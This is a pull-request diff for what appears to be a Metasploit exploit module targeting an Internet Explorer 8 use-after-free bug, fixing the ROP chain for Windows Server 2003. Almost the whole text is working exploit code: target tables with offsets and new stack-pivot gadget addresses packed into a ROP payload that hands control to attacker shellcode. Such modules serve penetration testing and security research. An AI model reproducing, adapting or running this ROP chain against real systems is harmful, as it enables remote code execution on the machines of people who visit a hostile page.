Merge pull request #1 from jvazquez-r7/ie_w2003

fixed rop chain for w2003

Author: firefart

modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb

@@ -58,8 +58,8 @@ def initialize(info={})
 					[ 'Automatic', {} ],
 					[ 'IE 8 on Windows XP SP3',       { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
 					[ 'IE 8 on Windows Vista',        { 'Rop' => :jre,    'Offset' => '0x586' } ], # 0x0c0c0b30
-					[ 'IE 8 on Windows Server 2003',  { 'Rop' => :jre,    'Offset' => '0x586' } ], # 0x0c0c0b30
-					[ 'IE 8 on Windows 7',            { 'Rop' => :jre,    'Offset' => '0x586' } ]  # 0x0c0c0b30
+					[ 'IE 8 on Windows Server 2003',  { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
+					[ 'IE 8 on Windows 7',            { 'Rop' => :jre,    'Offset' => '0x586' } ], # 0x0c0c0b30
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Dec 27 2012",
@@ -152,10 +152,17 @@ def get_payload(t, cli)
 		case t['Rop']
 		when :msvcrt
 			print_status("Using msvcrt ROP")
-			stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
-			stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
-			stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
-			rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
+			if t['Name'] =~ /Windows XP/
+				stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
+				stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
+				stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
+				rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
+			else
+				stack_pivot = [0x77bcba5f].pack("V") * 54 # ret
+				stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret
+				stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
+				rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})
+			end
 		else
 			print_status("Using JRE ROP")
 			stack_pivot = [0x7c348b06].pack("V") * 54 # ret